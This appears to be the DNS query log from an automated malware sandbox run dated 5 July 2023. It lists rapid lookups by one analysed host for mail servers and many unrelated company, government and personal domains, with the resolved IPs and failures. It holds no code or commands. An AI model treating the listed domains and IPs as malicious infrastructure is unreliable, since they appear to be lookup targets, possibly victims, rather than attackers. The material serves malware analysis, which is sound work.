                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.480305910 CEST8.8.8.8192.168.2.60x49aeNo error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.482033014 CEST8.8.8.8192.168.2.60x8ab6No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.482033014 CEST8.8.8.8192.168.2.60x8ab6No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.538388014 CEST8.8.8.8192.168.2.60xcedbNo error (0)alt4.gmail-smtp-in.l.google.com173.194.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.582632065 CEST8.8.8.8192.168.2.60x3d7dNo error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.597692966 CEST8.8.8.8192.168.2.60xc980No error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.607089043 CEST8.8.8.8192.168.2.60xedf1No error (0)gmail-smtp-in.l.google.com108.177.126.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.608135939 CEST8.8.8.8192.168.2.60xa006Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.651366949 CEST8.8.8.8192.168.2.60xbd53No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.681387901 CEST8.8.8.8192.168.2.60x72cbNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.690648079 CEST8.8.8.8192.168.2.60x71bbNo error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.707068920 CEST8.8.8.8192.168.2.60xe8b2No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.750643015 CEST8.8.8.8192.168.2.60x8441No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.759720087 CEST8.8.8.8192.168.2.60x91beNo error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.764440060 CEST8.8.8.8192.168.2.60x3413No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.764550924 CEST8.8.8.8192.168.2.60x77c0No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.765271902 CEST8.8.8.8192.168.2.60xa73No error (0)in1.smtp.messaginguser.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.765271902 CEST8.8.8.8192.168.2.60xa73No error (0)in1.smtp.messaginguser.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.765271902 CEST8.8.8.8192.168.2.60xa73No error (0)in1.smtp.messaginguser.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.765271902 CEST8.8.8.8192.168.2.60xa73No error (0)in1.smtp.messaginguser.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.765271902 CEST8.8.8.8192.168.2.60xa73No error (0)in1.smtp.messaginguser.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.765271902 CEST8.8.8.8192.168.2.60xa73No error (0)in1.smtp.messaginguser.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.780034065 CEST8.8.8.8192.168.2.60xe00No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.800657988 CEST8.8.8.8192.168.2.60xc761No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.837410927 CEST8.8.8.8192.168.2.60xad48No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.896342993 CEST8.8.8.8192.168.2.60x9494Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.900403023 CEST8.8.8.8192.168.2.60x389fNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.934084892 CEST8.8.8.8192.168.2.60x77beNo error (0)cpmteam.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.934084892 CEST8.8.8.8192.168.2.60x77beNo error (0)cpmteam.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.978528976 CEST8.8.8.8192.168.2.60x32cbNo error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.994956017 CEST8.8.8.8192.168.2.60x1edfNo error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.996915102 CEST8.8.8.8192.168.2.60x4534No error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.000426054 CEST8.8.8.8192.168.2.60xf180No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.034693003 CEST8.8.8.8192.168.2.60x9fe1No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.052716017 CEST8.8.8.8192.168.2.60x8207No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.071058035 CEST8.8.8.8192.168.2.60xa53aNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.072211981 CEST8.8.8.8192.168.2.60x2797No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.072544098 CEST8.8.8.8192.168.2.60xd1fcNo error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.072544098 CEST8.8.8.8192.168.2.60xd1fcNo error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.089657068 CEST8.8.8.8192.168.2.60x9892No error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.090193033 CEST8.8.8.8192.168.2.60x9eb0No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.134521008 CEST8.8.8.8192.168.2.60x9e2aName error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.137789965 CEST8.8.8.8192.168.2.60x6638No error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.202089071 CEST8.8.8.8192.168.2.60xbc51No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.227045059 CEST8.8.8.8192.168.2.60xfd31No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.304114103 CEST8.8.8.8192.168.2.60x9eecNo error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.305073977 CEST8.8.8.8192.168.2.60xe9a6No error (0)dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.305073977 CEST8.8.8.8192.168.2.60xe9a6No error (0)dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.308274031 CEST8.8.8.8192.168.2.60x2107No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.308274031 CEST8.8.8.8192.168.2.60x2107No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.313173056 CEST8.8.8.8192.168.2.60x8fe3No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.315403938 CEST8.8.8.8192.168.2.60xe239Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.384238958 CEST8.8.8.8192.168.2.60x7207No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.384238958 CEST8.8.8.8192.168.2.60x7207No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.384238958 CEST8.8.8.8192.168.2.60x7207No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.384238958 CEST8.8.8.8192.168.2.60x7207No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.407695055 CEST8.8.8.8192.168.2.60xcfb7No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.438013077 CEST8.8.8.8192.168.2.60x6118No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.462405920 CEST8.8.8.8192.168.2.60x3f7fNo error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.462405920 CEST8.8.8.8192.168.2.60x3f7fNo error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.484129906 CEST8.8.8.8192.168.2.60x5c15No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.520148993 CEST8.8.8.8192.168.2.60xbb7fNo error (0)websy.com34.98.99.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.528121948 CEST8.8.8.8192.168.2.60xddbbNo error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.528156042 CEST8.8.8.8192.168.2.60x6369No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.533066988 CEST8.8.8.8192.168.2.60x2629No error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.533689022 CEST8.8.8.8192.168.2.60x34eeNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.541065931 CEST8.8.8.8192.168.2.60x126fNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.541065931 CEST8.8.8.8192.168.2.60x126fNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.541065931 CEST8.8.8.8192.168.2.60x126fNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.575427055 CEST8.8.8.8192.168.2.60xc3eaNo error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.575427055 CEST8.8.8.8192.168.2.60xc3eaNo error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.617052078 CEST8.8.8.8192.168.2.60x3f6aNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.630341053 CEST8.8.8.8192.168.2.60x78No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.631819010 CEST8.8.8.8192.168.2.60x4534No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.669817924 CEST8.8.8.8192.168.2.60x4deeNo error (0)dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.669817924 CEST8.8.8.8192.168.2.60x4deeNo error (0)dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.674597979 CEST8.8.8.8192.168.2.60x20d7No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.676791906 CEST8.8.8.8192.168.2.60xbc17No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.754678011 CEST8.8.8.8192.168.2.60x1b07No error (0)rkengg.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.754678011 CEST8.8.8.8192.168.2.60x1b07No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.754678011 CEST8.8.8.8192.168.2.60x1b07No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.754678011 CEST8.8.8.8192.168.2.60x1b07No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.788427114 CEST8.8.8.8192.168.2.60x8465No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.801361084 CEST8.8.8.8192.168.2.60xcc0dName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.811579943 CEST8.8.8.8192.168.2.60x4c5eServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.825134993 CEST8.8.8.8192.168.2.60xdfb8No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.826287985 CEST8.8.8.8192.168.2.60x4745No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.826615095 CEST8.8.8.8192.168.2.60x9fa7No error (0)sigtoa.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.826615095 CEST8.8.8.8192.168.2.60x9fa7No error (0)sigtoa.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.828372955 CEST8.8.8.8192.168.2.60x81f8No error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.832009077 CEST8.8.8.8192.168.2.60xba56Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.852227926 CEST8.8.8.8192.168.2.60x9fdeServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.866178036 CEST8.8.8.8192.168.2.60xad5dServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.912863016 CEST8.8.8.8192.168.2.60x54d3No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.912863016 CEST8.8.8.8192.168.2.60x54d3No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.912863016 CEST8.8.8.8192.168.2.60x54d3No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.952018023 CEST8.8.8.8192.168.2.60x38ffName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.956600904 CEST8.8.8.8192.168.2.60x5adeServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.963599920 CEST8.8.8.8192.168.2.60x9841Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.001737118 CEST8.8.8.8192.168.2.60xcbfdNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.005233049 CEST8.8.8.8192.168.2.60x1fcfNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.005233049 CEST8.8.8.8192.168.2.60x1fcfNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.005233049 CEST8.8.8.8192.168.2.60x1fcfNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.005233049 CEST8.8.8.8192.168.2.60x1fcfNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.025727987 CEST8.8.8.8192.168.2.60xc8d3Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.026361942 CEST8.8.8.8192.168.2.60xbb82No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.026361942 CEST8.8.8.8192.168.2.60xbb82No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.028070927 CEST8.8.8.8192.168.2.60x64a2Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.036037922 CEST8.8.8.8192.168.2.60x8baNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.070804119 CEST8.8.8.8192.168.2.60x1c61Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.083250999 CEST8.8.8.8192.168.2.60x1e2cNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.083250999 CEST8.8.8.8192.168.2.60x1e2cNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.095607996 CEST8.8.8.8192.168.2.60x1e58No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.096260071 CEST8.8.8.8192.168.2.60x6feNo error (0)arowines.com75.2.18.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.111932039 CEST8.8.8.8192.168.2.60xfc9aName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.121146917 CEST8.8.8.8192.168.2.60xb6efNo error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.132056952 CEST8.8.8.8192.168.2.60xdb39No error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.132056952 CEST8.8.8.8192.168.2.60xdb39No error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.132572889 CEST8.8.8.8192.168.2.60x2a4aName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.133212090 CEST8.8.8.8192.168.2.60xc901No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.153913021 CEST8.8.8.8192.168.2.60x98eaNo error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.153913021 CEST8.8.8.8192.168.2.60x98eaNo error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.173044920 CEST8.8.8.8192.168.2.60x3cc5No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.174844980 CEST8.8.8.8192.168.2.60x88a3Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.181005955 CEST8.8.8.8192.168.2.60x91a6Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.220418930 CEST8.8.8.8192.168.2.60x1f29No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.224558115 CEST8.8.8.8192.168.2.60x94f2No error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.224558115 CEST8.8.8.8192.168.2.60x94f2No error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.288758993 CEST8.8.8.8192.168.2.60xc79eNo error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.305448055 CEST8.8.8.8192.168.2.60x1f00Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.331286907 CEST8.8.8.8192.168.2.60xe233No error (0)rkengg.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.331286907 CEST8.8.8.8192.168.2.60xe233No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.331286907 CEST8.8.8.8192.168.2.60xe233No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.331286907 CEST8.8.8.8192.168.2.60xe233No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.346165895 CEST8.8.8.8192.168.2.60x94d7No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.352461100 CEST8.8.8.8192.168.2.60x9496No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.352461100 CEST8.8.8.8192.168.2.60x9496No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.352461100 CEST8.8.8.8192.168.2.60x9496No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.352461100 CEST8.8.8.8192.168.2.60x9496No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.354018927 CEST8.8.8.8192.168.2.60x5a5cName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.364551067 CEST8.8.8.8192.168.2.60x2cf1No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.365174055 CEST8.8.8.8192.168.2.60xd8a1No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.374742031 CEST8.8.8.8192.168.2.60xb3cServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.437077045 CEST8.8.8.8192.168.2.60xcd3bName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.474407911 CEST8.8.8.8192.168.2.60x5dfdNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.534231901 CEST8.8.8.8192.168.2.60xf248No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.539824009 CEST8.8.8.8192.168.2.60x9e25No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.564521074 CEST8.8.8.8192.168.2.60x241cNo error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.564521074 CEST8.8.8.8192.168.2.60x241cNo error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.594144106 CEST8.8.8.8192.168.2.60x40e5No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.634804964 CEST8.8.8.8192.168.2.60x15edServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.658252954 CEST8.8.8.8192.168.2.60xdf7fServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.680128098 CEST8.8.8.8192.168.2.60xa082No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.686775923 CEST8.8.8.8192.168.2.60xbf0dNo error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.716080904 CEST8.8.8.8192.168.2.60xc1faNo error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.716080904 CEST8.8.8.8192.168.2.60xc1faNo error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.718933105 CEST8.8.8.8192.168.2.60xdadServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.785243988 CEST8.8.8.8192.168.2.60x43aaName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
